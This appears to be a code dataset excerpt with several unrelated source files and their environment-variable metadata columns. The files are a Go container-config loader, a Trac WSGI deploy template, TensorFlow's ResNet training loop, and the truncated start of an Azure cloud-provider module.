if err != nil {
return errors.Wrap(err, _conmonVersionFormatErr)
}
if minor < _conmonMinMinorVersion {
return define.ErrConmonOutdated
}
if minor > _conmonMinMinorVersion {
return nil
}
patch, err := strconv.Atoi(matches[3])
if err != nil {
return errors.Wrap(err, _conmonVersionFormatErr)
}
if patch < _conmonMinPatchVersion {
return define.ErrConmonOutdated
}
if patch > _conmonMinPatchVersion {
return nil
}
return nil
}
// NewConfig creates a new Config. It starts with an empty config and, if
// specified, merges the config at `userConfigPath` path. Depending if we're
// running as root or rootless, we then merge the system configuration followed
// by merging the default config (hard-coded default in memory).
//
// Note that the OCI runtime is hard-set to `crun` if we're running on a system
// with cgroupsv2. Other OCI runtimes are not yet supporting cgroupsv2. This
// might change in the future.
func NewConfig(userConfigPath string) (*Config, error) {
config := &Config{} // start with an empty config
// First, try to read the user-specified config
if userConfigPath != "" {
var err error
config, err = readConfigFromFile(userConfigPath)
if err != nil {
return nil, errors.Wrapf(err, "error reading user config %q", userConfigPath)
}
}
// Now, check if the user can access system configs and merge them if needed.
if configs, err := systemConfigs(); err != nil {
return nil, errors.Wrapf(err, "error finding config on system")
} else {
migrated := false
for _, path := range configs {
systemConfig, err := readConfigFromFile(path)
if err != nil {
return nil, errors.Wrapf(err, "error reading system config %q", path)
}
// Handle CGroups v2 configuration migration.
// Migrate only the first config, and do it before
// merging.
if !migrated {
if err := cgroupV2Check(path, systemConfig); err != nil {
return nil, errors.Wrapf(err, "error rewriting configuration file %s", userConfigPath)
}
migrated = true
}
// Merge the it into the config. Any unset field in config will be
// over-written by the systemConfig.
if err := config.mergeConfig(systemConfig); err != nil {
return nil, errors.Wrapf(err, "error merging system config")
}
logrus.Debugf("Merged system config %q: %v", path, config)
}
}
// Finally, create a default config from memory and forcefully merge it into
// the config. This way we try to make sure that all fields are properly set
// and that user AND system config can partially set.
if defaultConfig, err := defaultConfigFromMemory(); err != nil {
return nil, errors.Wrapf(err, "error generating default config from memory")
} else {
// Check if we need to switch to cgroupfs and logger=file on rootless.
defaultConfig.checkCgroupsAndLogger()
if err := config.mergeConfig(defaultConfig); err != nil {
return nil, errors.Wrapf(err, "error merging default config from memory")
}
}
// Relative paths can cause nasty bugs, because core paths we use could
// shift between runs (or even parts of the program - the OCI runtime
// uses a different working directory than we do, for example.
if !filepath.IsAbs(config.StaticDir) {
return nil, errors.Wrapf(define.ErrInvalidArg, "static directory must be an absolute path - instead got %q", config.StaticDir)
}
if !filepath.IsAbs(config.TmpDir) {
return nil, errors.Wrapf(define.ErrInvalidArg, "temporary directory must be an absolute path - instead got %q", config.TmpDir)
}
if !filepath.IsAbs(config.VolumePath) {
return nil, errors.Wrapf(define.ErrInvalidArg, "volume path must be an absolute path - instead got %q", config.VolumePath)
}
return config, nil
}
func rootlessConfigPath() (string, error) {
home, err := util.HomeDir()
if err != nil {
return "", err
}
return filepath.Join(home, _rootlessConfigPath), nil
}
func systemConfigs() ([]string, error) {
if rootless.IsRootless() {
path, err := rootlessConfigPath()
if err != nil {
return nil, err
}
if _, err := os.Stat(path); err == nil {
return []string{path}, nil
}
return nil, err
}
configs := []string{}
if _, err := os.Stat(_rootOverrideConfigPath); err == nil {
configs = append(configs, _rootOverrideConfigPath)
}
if _, err := os.Stat(_rootConfigPath); err == nil {
configs = append(configs, _rootConfigPath)
}
return configs, nil
}
// checkCgroupsAndLogger checks if we're running rootless with the systemd
// cgroup manager. In case the user session isn't available, we're switching the
// cgroup manager to cgroupfs and the events logger backend to 'file'.
// Note, this only applies to rootless.
func (c *Config) checkCgroupsAndLogger() {
if !rootless.IsRootless() || (c.CgroupManager !=
define.SystemdCgroupsManager && c.EventsLogger == "file") {
return
}
session := os.Getenv("DBUS_SESSION_BUS_ADDRESS")
hasSession := session != ""
if hasSession && strings.HasPrefix(session, "unix:path=") {
_, err := os.Stat(strings.TrimPrefix(session, "unix:path="))
hasSession = err == nil
}
if !hasSession {
logrus.Warningf("The cgroups manager is set to systemd but there is no systemd user session available")
logrus.Warningf("For using systemd, you may need to login using an user session")
logrus.Warningf("Alternatively, you can enable lingering with: `loginctl enable-linger %d` (possibly as root)", rootless.GetRootlessUID())
logrus.Warningf("Falling back to --cgroup-manager=cgroupfs and --events-backend=file")
c.CgroupManager = define.CgroupfsCgroupsManager
c.EventsLogger = "file"
}
}
// Since runc does not currently support cgroupV2
// Change to default crun on first running of libpod.conf
// TODO Once runc has support for cgroups, this function should be removed.
func cgroupV2Check(configPath string, tmpConfig *Config) error {
if !tmpConfig.CgroupCheck && rootless.IsRootless() {
logrus.Debugf("Rewriting %s for CGroup v2 upgrade", configPath)
cgroupsV2, err := cgroups.IsCgroup2UnifiedMode()
if err != nil {
return err
}
if cgroupsV2 {
path, err := exec.LookPath("crun")
if err != nil {
logrus.Warnf("Can not find crun package on the host, containers might fail to run on cgroup V2 systems without crun: %q", err)
// Can't find crun path so do nothing
return nil
}
tmpConfig.CgroupCheck = true
tmpConfig.OCIRuntime = path
if err := tmpConfig.Write(configPath); err != nil {
return err
}
}
}
return nil
}
|
[
"\"DBUS_SESSION_BUS_ADDRESS\""
] |
[] |
[
"DBUS_SESSION_BUS_ADDRESS"
] |
[]
|
["DBUS_SESSION_BUS_ADDRESS"]
|
go
| 1 | 0 | |
trac/web/templates/deploy_trac.wsgi
|
{##}#!${executable}
{##}# -*- coding: utf-8 -*-
{##}#
{##}# Copyright (C)2008-2009 Edgewall Software
{##}# Copyright (C) 2008 Noah Kantrowitz <[email protected]>
{##}# All rights reserved.
{##}#
{##}# This software is licensed as described in the file COPYING, which
{##}# you should have received as part of this distribution. The terms
{##}# are also available at http://trac.edgewall.org/wiki/TracLicense.
{##}#
{##}# This software consists of voluntary contributions made by many
{##}# individuals. For the exact contribution history, see the revision
{##}# history and logs, available at http://trac.edgewall.org/log/.
{##}#
{##}# Author: Noah Kantrowitz <[email protected]>
import os
def application(environ, start_request):
if not 'trac.env_parent_dir' in environ:
environ.setdefault('trac.env_path', ${repr(env.path)})
if 'PYTHON_EGG_CACHE' in environ:
os.environ['PYTHON_EGG_CACHE'] = environ['PYTHON_EGG_CACHE']
elif 'trac.env_path' in environ:
os.environ['PYTHON_EGG_CACHE'] = \
os.path.join(environ['trac.env_path'], '.egg-cache')
elif 'trac.env_parent_dir' in environ:
os.environ['PYTHON_EGG_CACHE'] = \
os.path.join(environ['trac.env_parent_dir'], '.egg-cache')
from trac.web.main import dispatch_request
return dispatch_request(environ, start_request)
|
[] |
[] |
[
"PYTHON_EGG_CACHE"
] |
[]
|
["PYTHON_EGG_CACHE"]
|
python
| 1 | 0 | |
official/resnet/resnet_run_loop.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains utility and supporting functions for ResNet.
This module contains ResNet code which does not directly build layers. This
includes dataset management, hyperparameter and optimizer code, and argument
parsing. Code for defining the ResNet layers can be found in resnet_model.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import multiprocessing
import os
# pylint: disable=g-bad-import-order
from absl import flags
import tensorflow as tf
from tensorflow.contrib.data.python.ops import threadpool
from official.resnet import resnet_model
from official.utils.flags import core as flags_core
from official.utils.export import export
from official.utils.logs import hooks_helper
from official.utils.logs import logger
from official.resnet import imagenet_preprocessing
from official.utils.misc import distribution_utils
from official.utils.misc import model_helpers
################################################################################
# Functions for input processing.
################################################################################
def process_record_dataset(dataset,
is_training,
batch_size,
shuffle_buffer,
parse_record_fn,
num_epochs=1,
dtype=tf.float32,
datasets_num_private_threads=None,
num_parallel_batches=1):
"""Given a Dataset with raw records, return an iterator over the records.
Args:
dataset: A Dataset representing raw records
is_training: A boolean denoting whether the input is for training.
batch_size: The number of samples per batch.
shuffle_buffer: The buffer size to use when shuffling records. A larger
value results in better randomness, but smaller values reduce startup
time and use less memory.
parse_record_fn: A function that takes a raw record and returns the
corresponding (image, label) pair.
num_epochs: The number of epochs to repeat the dataset.
dtype: Data type to use for images/features.
datasets_num_private_threads: Number of threads for a private
threadpool created for all datasets computation.
num_parallel_batches: Number of parallel batches for tf.data.
Returns:
Dataset of (image, label) pairs ready for iteration.
"""
# Prefetches a batch at a time to smooth out the time taken to load input
# files for shuffling and processing.
dataset = dataset.prefetch(buffer_size=batch_size)
if is_training:
# Shuffles records before repeating to respect epoch boundaries.
dataset = dataset.shuffle(buffer_size=shuffle_buffer)
# Repeats the dataset for the number of epochs to train.
dataset = dataset.repeat(num_epochs)
# Parses the raw records into images and labels.
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
lambda value: parse_record_fn(value, is_training, dtype),
batch_size=batch_size,
num_parallel_batches=num_parallel_batches,
drop_remainder=False))
# Operations between the final prefetch and the get_next call to the iterator
# will happen synchronously during run time. We prefetch here again to
# background all of the above processing work and keep it out of the
# critical training path. Setting buffer_size to tf.contrib.data.AUTOTUNE
# allows DistributionStrategies to adjust how many batches to fetch based
# on how many devices are present.
dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
# Defines a specific size thread pool for tf.data operations.
if datasets_num_private_threads:
tf.compat.v1.logging.info('datasets_num_private_threads: %s',
datasets_num_private_threads)
dataset = threadpool.override_threadpool(
dataset,
threadpool.PrivateThreadPool(
datasets_num_private_threads,
display_name='input_pipeline_thread_pool'))
return dataset
def get_synth_input_fn(height, width, num_channels, num_classes,
dtype=tf.float32):
"""Returns an input function that returns a dataset with random data.
This input_fn returns a data set that iterates over a set of random data and
bypasses all preprocessing, e.g. jpeg decode and copy. The host to device
copy is still included. This used to find the upper throughput bound when
tunning the full input pipeline.
Args:
height: Integer height that will be used to create a fake image tensor.
width: Integer width that will be used to create a fake image tensor.
num_channels: Integer depth that will be used to create a fake image tensor.
num_classes: Number of classes that should be represented in the fake labels
tensor
dtype: Data type for features/images.
Returns:
An input_fn that can be used in place of a real one to return a dataset
that can be used for iteration.
"""
# pylint: disable=unused-argument
def input_fn(is_training, data_dir, batch_size, *args, **kwargs):
"""Returns dataset filled with random data."""
# Synthetic input should be within [0, 255].
inputs = tf.random.truncated_normal(
[batch_size] + [height, width, num_channels],
dtype=dtype,
mean=127,
stddev=60,
name='synthetic_inputs')
labels = tf.random.uniform(
[batch_size],
minval=0,
maxval=num_classes - 1,
dtype=tf.int32,
name='synthetic_labels')
data = tf.data.Dataset.from_tensors((inputs, labels)).repeat()
data = data.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return data
return input_fn
def image_bytes_serving_input_fn(image_shape, dtype=tf.float32):
"""Serving input fn for raw jpeg images."""
def _preprocess_image(image_bytes):
"""Preprocess a single raw image."""
# Bounding box around the whole image.
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=dtype, shape=[1, 1, 4])
height, width, num_channels = image_shape
image = imagenet_preprocessing.preprocess_image(
image_bytes, bbox, height, width, num_channels, is_training=False)
return image
image_bytes_list = tf.compat.v1.placeholder(
shape=[None], dtype=tf.string, name='input_tensor')
images = tf.map_fn(
_preprocess_image, image_bytes_list, back_prop=False, dtype=dtype)
return tf.estimator.export.TensorServingInputReceiver(
images, {'image_bytes': image_bytes_list})
def override_flags_and_set_envars_for_gpu_thread_pool(flags_obj):
"""Override flags and set env_vars for performance.
These settings exist to test the difference between using stock settings
and manual tuning. It also shows some of the ENV_VARS that can be tweaked to
squeeze a few extra examples per second. These settings are defaulted to the
current platform of interest, which changes over time.
On systems with small numbers of cpu cores, e.g. under 8 logical cores,
setting up a gpu thread pool with `tf_gpu_thread_mode=gpu_private` may perform
poorly.
Args:
flags_obj: Current flags, which will be adjusted possibly overriding
what has been set by the user on the command-line.
"""
cpu_count = multiprocessing.cpu_count()
tf.compat.v1.logging.info('Logical CPU cores: %s', cpu_count)
# Sets up thread pool for each GPU for op scheduling.
per_gpu_thread_count = 1
total_gpu_thread_count = per_gpu_thread_count * flags_obj.num_gpus
os.environ['TF_GPU_THREAD_MODE'] = flags_obj.tf_gpu_thread_mode
os.environ['TF_GPU_THREAD_COUNT'] = str(per_gpu_thread_count)
tf.compat.v1.logging.info('TF_GPU_THREAD_COUNT: %s',
os.environ['TF_GPU_THREAD_COUNT'])
tf.compat.v1.logging.info('TF_GPU_THREAD_MODE: %s',
os.environ['TF_GPU_THREAD_MODE'])
# Reduces general thread pool by number of threads used for GPU pool.
main_thread_count = cpu_count - total_gpu_thread_count
flags_obj.inter_op_parallelism_threads = main_thread_count
# Sets thread count for tf.data. Logical cores minus threads assign to the
# private GPU pool along with 2 thread per GPU for event monitoring and
# sending / receiving tensors.
num_monitoring_threads = 2 * flags_obj.num_gpus
flags_obj.datasets_num_private_threads = (cpu_count - total_gpu_thread_count
- num_monitoring_threads)
################################################################################
# Functions for running training/eval/validation loops for the model.
################################################################################
def learning_rate_with_decay(
batch_size, batch_denom, num_images, boundary_epochs, decay_rates,
base_lr=0.1, warmup=False):
"""Get a learning rate that decays step-wise as training progresses.
Args:
batch_size: the number of examples processed in each training batch.
batch_denom: this value will be used to scale the base learning rate.
`0.1 * batch size` is divided by this number, such that when
batch_denom == batch_size, the initial learning rate will be 0.1.
num_images: total number of images that will be used for training.
boundary_epochs: list of ints representing the epochs at which we
decay the learning rate.
decay_rates: list of floats representing the decay rates to be used
for scaling the learning rate. It should have one more element
than `boundary_epochs`, and all elements should have the same type.
base_lr: Initial learning rate scaled based on batch_denom.
warmup: Run a 5 epoch warmup to the initial lr.
Returns:
Returns a function that takes a single argument - the number of batches
trained so far (global_step)- and returns the learning rate to be used
for training the next batch.
"""
initial_learning_rate = base_lr * batch_size / batch_denom
batches_per_epoch = num_images / batch_size
# Reduce the learning rate at certain epochs.
# CIFAR-10: divide by 10 at epoch 100, 150, and 200
# ImageNet: divide by 10 at epoch 30, 60, 80, and 90
boundaries = [int(batches_per_epoch * epoch) for epoch in boundary_epochs]
vals = [initial_learning_rate * decay for decay in decay_rates]
def learning_rate_fn(global_step):
"""Builds scaled learning rate function with 5 epoch warm up."""
lr = tf.compat.v1.train.piecewise_constant(global_step, boundaries, vals)
if warmup:
warmup_steps = int(batches_per_epoch * 5)
warmup_lr = (
initial_learning_rate * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
return tf.cond(pred=global_step < warmup_steps,
true_fn=lambda: warmup_lr,
false_fn=lambda: lr)
return lr
return learning_rate_fn
def resnet_model_fn(features, labels, mode, model_class,
resnet_size, weight_decay, learning_rate_fn, momentum,
data_format, resnet_version, loss_scale,
loss_filter_fn=None, dtype=resnet_model.DEFAULT_DTYPE,
fine_tune=False):
"""Shared functionality for different resnet model_fns.
Initializes the ResnetModel representing the model layers
and uses that model to build the necessary EstimatorSpecs for
the `mode` in question. For training, this means building losses,
the optimizer, and the train op that get passed into the EstimatorSpec.
For evaluation and prediction, the EstimatorSpec is returned without
a train op, but with the necessary parameters for the given mode.
Args:
features: tensor representing input images
labels: tensor representing class labels for all input images
mode: current estimator mode; should be one of
`tf.estimator.ModeKeys.TRAIN`, `EVALUATE`, `PREDICT`
model_class: a class representing a TensorFlow model that has a __call__
function. We assume here that this is a subclass of ResnetModel.
resnet_size: A single integer for the size of the ResNet model.
weight_decay: weight decay loss rate used to regularize learned variables.
learning_rate_fn: function that returns the current learning rate given
the current global_step
momentum: momentum term used for optimization
data_format: Input format ('channels_last', 'channels_first', or None).
If set to None, the format is dependent on whether a GPU is available.
resnet_version: Integer representing which version of the ResNet network to
use. See README for details. Valid values: [1, 2]
loss_scale: The factor to scale the loss for numerical stability. A detailed
summary is present in the arg parser help text.
loss_filter_fn: function that takes a string variable name and returns
True if the var should be included in loss calculation, and False
otherwise. If None, batch_normalization variables will be excluded
from the loss.
dtype: the TensorFlow dtype to use for calculations.
fine_tune: If True only train the dense layers(final layers).
Returns:
EstimatorSpec parameterized according to the input params and the
current mode.
"""
# Generate a summary node for the images
tf.compat.v1.summary.image('images', features, max_outputs=6)
# Checks that features/images have same data type being used for calculations.
assert features.dtype == dtype
model = model_class(resnet_size, data_format, resnet_version=resnet_version,
dtype=dtype)
logits = model(features, mode == tf.estimator.ModeKeys.TRAIN)
# This acts as a no-op if the logits are already in fp32 (provided logits are
# not a SparseTensor). If dtype is is low precision, logits must be cast to
# fp32 for numerical stability.
logits = tf.cast(logits, tf.float32)
predictions = {
'classes': tf.argmax(input=logits, axis=1),
'probabilities': tf.nn.softmax(logits, name='softmax_tensor')
}
if mode == tf.estimator.ModeKeys.PREDICT:
# Return the predictions and the specification for serving a SavedModel
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs={
'predict': tf.estimator.export.PredictOutput(predictions)
})
# Calculate loss, which includes softmax cross entropy and L2 regularization.
cross_entropy = tf.compat.v1.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
# Create a tensor named cross_entropy for logging purposes.
tf.identity(cross_entropy, name='cross_entropy')
tf.compat.v1.summary.scalar('cross_entropy', cross_entropy)
# If no loss_filter_fn is passed, assume we want the default behavior,
# which is that batch_normalization variables are excluded from loss.
def exclude_batch_norm(name):
return 'batch_normalization' not in name
loss_filter_fn = loss_filter_fn or exclude_batch_norm
# Add weight decay to the loss.
l2_loss = weight_decay * tf.add_n(
# loss is computed using fp32 for numerical stability.
[tf.nn.l2_loss(tf.cast(v, tf.float32))
for v in tf.compat.v1.trainable_variables() if loss_filter_fn(v.name)])
tf.compat.v1.summary.scalar('l2_loss', l2_loss)
loss = cross_entropy + l2_loss
if mode == tf.estimator.ModeKeys.TRAIN:
global_step = tf.compat.v1.train.get_or_create_global_step()
learning_rate = learning_rate_fn(global_step)
# Create a tensor named learning_rate for logging purposes
tf.identity(learning_rate, name='learning_rate')
tf.compat.v1.summary.scalar('learning_rate', learning_rate)
optimizer = tf.compat.v1.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
def _dense_grad_filter(gvs):
"""Only apply gradient updates to the final layer.
This function is used for fine tuning.
Args:
gvs: list of tuples with gradients and variable info
Returns:
filtered gradients so that only the dense layer remains
"""
return [(g, v) for g, v in gvs if 'dense' in v.name]
if loss_scale != 1:
# When computing fp16 gradients, often intermediate tensor values are
# so small, they underflow to 0. To avoid this, we multiply the loss by
# loss_scale to make these tensor values loss_scale times bigger.
scaled_grad_vars = optimizer.compute_gradients(loss * loss_scale)
if fine_tune:
scaled_grad_vars = _dense_grad_filter(scaled_grad_vars)
# Once the gradient computation is complete we can scale the gradients
# back to the correct scale before passing them to the optimizer.
unscaled_grad_vars = [(grad / loss_scale, var)
for grad, var in scaled_grad_vars]
minimize_op = optimizer.apply_gradients(unscaled_grad_vars, global_step)
else:
grad_vars = optimizer.compute_gradients(loss)
if fine_tune:
grad_vars = _dense_grad_filter(grad_vars)
minimize_op = optimizer.apply_gradients(grad_vars, global_step)
update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)
train_op = tf.group(minimize_op, update_ops)
else:
train_op = None
accuracy = tf.compat.v1.metrics.accuracy(labels, predictions['classes'])
accuracy_top_5 = tf.compat.v1.metrics.mean(
tf.nn.in_top_k(predictions=logits, targets=labels, k=5, name='top_5_op'))
metrics = {'accuracy': accuracy,
'accuracy_top_5': accuracy_top_5}
# Create a tensor named train_accuracy for logging purposes
tf.identity(accuracy[1], name='train_accuracy')
tf.identity(accuracy_top_5[1], name='train_accuracy_top_5')
tf.compat.v1.summary.scalar('train_accuracy', accuracy[1])
tf.compat.v1.summary.scalar('train_accuracy_top_5', accuracy_top_5[1])
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=metrics)
def resnet_main(
flags_obj, model_function, input_function, dataset_name, shape=None):
"""Shared main loop for ResNet Models.
Args:
flags_obj: An object containing parsed flags. See define_resnet_flags()
for details.
model_function: the function that instantiates the Model and builds the
ops for train/eval. This will be passed directly into the estimator.
input_function: the function that processes the dataset and returns a
dataset that the estimator can train on. This will be wrapped with
all the relevant flags for running and passed to estimator.
dataset_name: the name of the dataset for training and evaluation. This is
used for logging purpose.
shape: list of ints representing the shape of the images used for training.
This is only used if flags_obj.export_dir is passed.
Returns:
Dict of results of the run.
"""
model_helpers.apply_clean(flags.FLAGS)
# Ensures flag override logic is only executed if explicitly triggered.
if flags_obj.tf_gpu_thread_mode:
override_flags_and_set_envars_for_gpu_thread_pool(flags_obj)
# Creates session config. allow_soft_placement = True, is required for
# multi-GPU and is not harmful for other modes.
session_config = tf.compat.v1.ConfigProto(
inter_op_parallelism_threads=flags_obj.inter_op_parallelism_threads,
intra_op_parallelism_threads=flags_obj.intra_op_parallelism_threads,
allow_soft_placement=True)
distribution_strategy = distribution_utils.get_distribution_strategy(
flags_core.get_num_gpus(flags_obj), flags_obj.all_reduce_alg)
# Creates a `RunConfig` that checkpoints every 24 hours which essentially
# results in checkpoints determined only by `epochs_between_evals`.
run_config = tf.estimator.RunConfig(
train_distribute=distribution_strategy,
session_config=session_config,
save_checkpoints_secs=60*60*24)
# Initializes model with all but the dense layer from pretrained ResNet.
if flags_obj.pretrained_model_checkpoint_path is not None:
warm_start_settings = tf.estimator.WarmStartSettings(
flags_obj.pretrained_model_checkpoint_path,
vars_to_warm_start='^(?!.*dense)')
else:
warm_start_settings = None
classifier = tf.estimator.Estimator(
model_fn=model_function, model_dir=flags_obj.model_dir, config=run_config,
warm_start_from=warm_start_settings, params={
'resnet_size': int(flags_obj.resnet_size),
'data_format': flags_obj.data_format,
'batch_size': flags_obj.batch_size,
'resnet_version': int(flags_obj.resnet_version),
'loss_scale': flags_core.get_loss_scale(flags_obj),
'dtype': flags_core.get_tf_dtype(flags_obj),
'fine_tune': flags_obj.fine_tune
})
run_params = {
'batch_size': flags_obj.batch_size,
'dtype': flags_core.get_tf_dtype(flags_obj),
'resnet_size': flags_obj.resnet_size,
'resnet_version': flags_obj.resnet_version,
'synthetic_data': flags_obj.use_synthetic_data,
'train_epochs': flags_obj.train_epochs,
}
if flags_obj.use_synthetic_data:
dataset_name = dataset_name + '-synthetic'
benchmark_logger = logger.get_benchmark_logger()
benchmark_logger.log_run_info('resnet', dataset_name, run_params,
test_id=flags_obj.benchmark_test_id)
train_hooks = hooks_helper.get_train_hooks(
flags_obj.hooks,
model_dir=flags_obj.model_dir,
batch_size=flags_obj.batch_size)
def input_fn_train(num_epochs):
return input_function(
is_training=True,
data_dir=flags_obj.data_dir,
batch_size=distribution_utils.per_device_batch_size(
flags_obj.batch_size, flags_core.get_num_gpus(flags_obj)),
num_epochs=num_epochs,
dtype=flags_core.get_tf_dtype(flags_obj),
datasets_num_private_threads=flags_obj.datasets_num_private_threads,
num_parallel_batches=flags_obj.datasets_num_parallel_batches)
def input_fn_eval():
return input_function(
is_training=False,
data_dir=flags_obj.data_dir,
batch_size=distribution_utils.per_device_batch_size(
flags_obj.batch_size, flags_core.get_num_gpus(flags_obj)),
num_epochs=1,
dtype=flags_core.get_tf_dtype(flags_obj))
if flags_obj.eval_only or not flags_obj.train_epochs:
# If --eval_only is set, perform a single loop with zero train epochs.
schedule, n_loops = [0], 1
else:
# Compute the number of times to loop while training. All but the last
# pass will train for `epochs_between_evals` epochs, while the last will
# train for the number needed to reach `training_epochs`. For instance if
# train_epochs = 25 and epochs_between_evals = 10
# schedule will be set to [10, 10, 5]. That is to say, the loop will:
# Train for 10 epochs and then evaluate.
# Train for another 10 epochs and then evaluate.
# Train for a final 5 epochs (to reach 25 epochs) and then evaluate.
n_loops = math.ceil(flags_obj.train_epochs / flags_obj.epochs_between_evals)
schedule = [flags_obj.epochs_between_evals for _ in range(int(n_loops))]
schedule[-1] = flags_obj.train_epochs - sum(schedule[:-1]) # over counting.
for cycle_index, num_train_epochs in enumerate(schedule):
tf.compat.v1.logging.info('Starting cycle: %d/%d', cycle_index,
int(n_loops))
if num_train_epochs:
classifier.train(input_fn=lambda: input_fn_train(num_train_epochs),
hooks=train_hooks, max_steps=flags_obj.max_train_steps)
tf.compat.v1.logging.info('Starting to evaluate.')
# flags_obj.max_train_steps is generally associated with testing and
# profiling. As a result it is frequently called with synthetic data, which
# will iterate forever. Passing steps=flags_obj.max_train_steps allows the
# eval (which is generally unimportant in those circumstances) to terminate.
# Note that eval will run for max_train_steps each loop, regardless of the
# global_step count.
eval_results = classifier.evaluate(input_fn=input_fn_eval,
steps=flags_obj.max_train_steps)
benchmark_logger.log_evaluation_result(eval_results)
if model_helpers.past_stop_threshold(
flags_obj.stop_threshold, eval_results['accuracy']):
break
if flags_obj.export_dir is not None:
# Exports a saved model for the given classifier.
export_dtype = flags_core.get_tf_dtype(flags_obj)
if flags_obj.image_bytes_as_serving_input:
input_receiver_fn = functools.partial(
image_bytes_serving_input_fn, shape, dtype=export_dtype)
else:
input_receiver_fn = export.build_tensor_serving_input_receiver_fn(
shape, batch_size=flags_obj.batch_size, dtype=export_dtype)
classifier.export_savedmodel(flags_obj.export_dir, input_receiver_fn,
strip_default_attrs=True)
return eval_results
def define_resnet_flags(resnet_size_choices=None):
"""Add flags and validators for ResNet."""
flags_core.define_base()
flags_core.define_performance(num_parallel_calls=False,
tf_gpu_thread_mode=True,
datasets_num_private_threads=True,
datasets_num_parallel_batches=True)
flags_core.define_image()
flags_core.define_benchmark()
flags.adopt_module_key_flags(flags_core)
flags.DEFINE_enum(
name='resnet_version', short_name='rv', default='1',
enum_values=['1', '2'],
help=flags_core.help_wrap(
'Version of ResNet. (1 or 2) See README.md for details.'))
flags.DEFINE_bool(
name='fine_tune', short_name='ft', default=False,
help=flags_core.help_wrap(
'If True do not train any parameters except for the final layer.'))
flags.DEFINE_string(
name='pretrained_model_checkpoint_path', short_name='pmcp', default=None,
help=flags_core.help_wrap(
'If not None initialize all the network except the final layer with '
'these values'))
flags.DEFINE_boolean(
name='eval_only', default=False,
help=flags_core.help_wrap('Skip training and only perform evaluation on '
'the latest checkpoint.'))
flags.DEFINE_boolean(
name='image_bytes_as_serving_input', default=False,
help=flags_core.help_wrap(
'If True exports savedmodel with serving signature that accepts '
'JPEG image bytes instead of a fixed size [HxWxC] tensor that '
'represents the image. The former is easier to use for serving at '
'the expense of image resize/cropping being done as part of model '
'inference. Note, this flag only applies to ImageNet and cannot '
'be used for CIFAR.'))
flags.DEFINE_boolean(
name='turn_off_distribution_strategy', default=False,
help=flags_core.help_wrap('Set to True to not use distribution '
'strategies.'))
choice_kwargs = dict(
name='resnet_size', short_name='rs', default='50',
help=flags_core.help_wrap('The size of the ResNet model to use.'))
if resnet_size_choices is None:
flags.DEFINE_string(**choice_kwargs)
else:
flags.DEFINE_enum(enum_values=resnet_size_choices, **choice_kwargs)
|
[] |
[] |
[
"TF_GPU_THREAD_MODE",
"TF_GPU_THREAD_COUNT"
] |
[]
|
["TF_GPU_THREAD_MODE", "TF_GPU_THREAD_COUNT"]
|
python
| 2 | 0 | |
lepton/azure.go
|
package lepton
import (
"bytes"
"context"
"fmt"
"net/url"
"os"
"path/filepath"
"strings"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/adal"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/autorest/to"
"github.com/Azure/azure-sdk-for-go/services/compute/mgmt/2020-06-01/compute"
"github.com/Azure/azure-storage-blob-go/azblob"
"github.com/olekukonko/tablewriter"
)
// most of this is ripped from the samples repo:
// https://github.com/Azure-Samples/azure-sdk-for-go-samples/blob/master/compute/vm.go
// the azure sdk is fairly round-a-bout and could use some heavy
// refactoring
const (
userAgent = "ops"
fakepubkey = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7laRyN4B3YZmVrDEZLZoIuUA72pQ0DpGuZBZWykCofIfCPrFZAJgFvonKGgKJl6FGKIunkZL9Us/mV4ZPkZhBlE7uX83AAf5i9Q8FmKpotzmaxN10/1mcnEE7pFvLoSkwqrQSkrrgSm8zaJ3g91giXSbtqvSIj/vk2f05stYmLfhAwNo3Oh27ugCakCoVeuCrZkvHMaJgcYrIGCuFo6q0Pfk9rsZyriIqEa9AtiUOtViInVYdby7y71wcbl0AbbCZsTSqnSoVxm2tRkOsXV6+8X4SnwcmZbao3H+zfO1GBhQOLxJ4NQbzAa8IJh810rYARNLptgmsd4cYXVOSosTX azureuser"
)
var (
environment *azure.Environment
armAuthorizer autorest.Authorizer
cloudName = "AzurePublicCloud"
)
// Azure contains all operations for Azure
type Azure struct {
Storage *AzureStorage
subID string
clientID string
tenantID string
clientSecret string
locationDefault string
groupName string
}
// Environment returns an `azure.Environment{...}` for the current
// cloud.
func (a *Azure) Environment() *azure.Environment {
if environment != nil {
return environment
}
env, err := azure.EnvironmentFromName(cloudName)
if err != nil {
// TODO: move to initialization of var
panic(fmt.Sprintf(
"invalid cloud name '%s' specified, cannot continue\n", cloudName))
}
environment = &env
return environment
}
func (a *Azure) getAuthorizerForResource(resource string) (autorest.Authorizer, error) {
var authr autorest.Authorizer
var err error
oauthConfig, err := adal.NewOAuthConfig(
a.Environment().ActiveDirectoryEndpoint, a.tenantID)
if err != nil {
return nil, err
}
token, err := adal.NewServicePrincipalToken(
*oauthConfig, a.clientID, a.clientSecret, resource)
if err != nil {
return nil, err
}
authr = autorest.NewBearerAuthorizer(token)
return authr, err
}
// GetResourceManagementAuthorizer returns an autorest authorizer.
func (a *Azure) GetResourceManagementAuthorizer() (autorest.Authorizer, error) {
if armAuthorizer != nil {
return armAuthorizer, nil
}
var authr autorest.Authorizer
var err error
